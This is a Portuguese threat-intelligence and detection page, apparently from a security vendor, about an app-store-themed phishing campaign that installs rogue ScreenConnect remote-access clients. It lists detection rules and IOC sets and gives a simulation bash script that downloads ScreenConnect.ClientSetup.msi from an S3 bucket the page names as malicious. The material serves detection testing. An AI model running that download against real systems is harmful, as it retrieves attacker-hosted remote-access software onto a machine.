Disseminação em Larga Escala do ScreenConnect por meio de Phishing Temático da App Store
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Uma campanha de phishing em larga escala está utilizando técnicas avançadas de engenharia social para implantar clientes ConnectWise ScreenConnect não autorizados. Os atacantes se passam por serviços confiáveis, como a Microsoft Store, a Apple App Store e o Google Meet, através de conteúdo dinâmico da web e prompts de atualização fraudulentos. Uma vez instalado, o software RMM dá aos agentes de ameaça acesso remoto persistente aos sistemas comprometidos.
Investigação
A equipe LevelBlue OpsCTI descobriu a campanha através da análise de uma estrutura de phishing de atualização falsa e infraestrutura reutilizada. Os pesquisadores identificaram estruturas de diretório consistentes, hashes de recursos HTTP recorrentes e scripts assistidos por IA usados para perfilar potenciais vítimas. A investigação também revelou abuso das APIs do Telegram Bot para telemetria em tempo real e relatórios de infecção.
Mitigação
As organizações devem priorizar a detecção de software RMM não autorizado e monitorar downloads executáveis de serviços de nuvem pública desconhecidos, como Amazon S3 ou Cloudflare R2. Recomenda-se também controlar a identificação de personificação de marcas e tráfego de API de Bot do Telegram não autorizado. Revisões regulares de inventário de endpoints podem ajudar a descobrir instalações clandestinas do ScreenConnect e comprometimentos existentes.
Resposta
Se houver suspeita de comprometimento, os sistemas afetados devem ser isolados imediatamente e quaisquer clientes ScreenConnect comunicando-se com instâncias de relé não autorizadas devem ser investigados. Logs de rede devem ser revisados em busca de conexões suspeitas com domínios de phishing conhecidos ou pontos de extremidade de armazenamento em nuvem pública. Os respondedores também devem examinar processos iniciados por msiexec.exe ou PowerShell que baixam arquivos de fontes externas.
Fluxo de Ataque
Detecções
Possibilidade de Execução Através de Linhas de Comando PowerShell Ocultas (via cmdline)
Proof of Value
Chamar Métodos .NET Suspeitos do Powershell (via powershell)
Proof of Value
Possível Execução de Arquivos pelo Msiexec em Diretório Incomum (via cmdline)
Proof of Value
Software Alternativo de Acesso/ Gestão Remota (via process_creation)
Proof of Value
Possível Abuso de Domínio de Desenvolvimento da Cloudflare (via dns)
Proof of Value
Comando e Controle Suspeitos por Solicitação DNS de Domínio de Alto Nível (TLD) Incomum (via dns)
Proof of Value
IOCs (HashSha256) para detectar: Além de ‘Atualizações Falsas’: De Phishing Temático de Loja de Aplicativos à Distribuição em Larga Escala do ScreenConnect
Proof of Value
IOCs (SourceIP) para detectar: Além de ‘Atualizações Falsas’: De Phishing Temático de Loja de Aplicativos à Distribuição em Larga Escala do ScreenConnect
Proof of Value
IOCs (DestinationIP) para detectar: Além de ‘Atualizações Falsas’: De Phishing Temático de Loja de Aplicativos à Distribuição em Larga Escala do ScreenConnect
Proof of Value
Execução de Instalação Não Autorizada do ScreenConnect via Phishing [Criação de Processo no Windows]
Proof of Value
Detectar Download do Instalador ScreenConnect de Buckets S3 Suspeitos [AWS Cloudtrail]
Proof of Value
Execução de Simulação
Pré-requisito: A verificação de Telemetria e Linha Base deve ter sido aprovada.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar a gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa e Comandos de Ataque: Um atacante estabeleceu uma campanha de phishing. Para evitar detecção por antivírus baseado em arquivo, eles hospedam uma ferramenta legítima de acesso remoto (ScreenConnect) em um bucket AWS S3 público que imita a distribuição de software legítimo. O atacante instrui uma vítima a baixar o instalador. Esta ação aciona um evento
GetObjectna AWS CloudTrail, visando o bucket malicioso específicoeobtdk.s3.us-east-2.amazonaws.come o nome do arquivo específicoScreenConnect.ClientSetup.msi. -
Script de Teste de Regressão: [Note: Since we cannot interact with real malicious buckets, this script simulates the request que geraria a entrada no log caso o bucket existisse.
#!/bin/bash # Script de simulação para acionar a regra de detecção do CloudTrail # Isso imita a chamada de API que um adversário faria para baixar a ferramenta echo "[+] Iniciando Simulação: Baixando ScreenConnect de S3 Malicioso..." # Usamos a CLI da AWS para tentar uma solicitação GET. # Mesmo se o bucket não existir, a tentativa de 'solicitação' gera o evento CloudTrail # em um ambiente real onde o bucket está configurado. aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2 echo "[+] Comando de simulação enviado. Verifique o CloudTrail para eventos GetObject visando 'eobtdk.s3.us-east-2.amazonaws.com'." -
Comandos de Limpeza:
# Remova quaisquer arquivos baixados durante a simulação rm -f ScreenConnect.ClientSetup.msi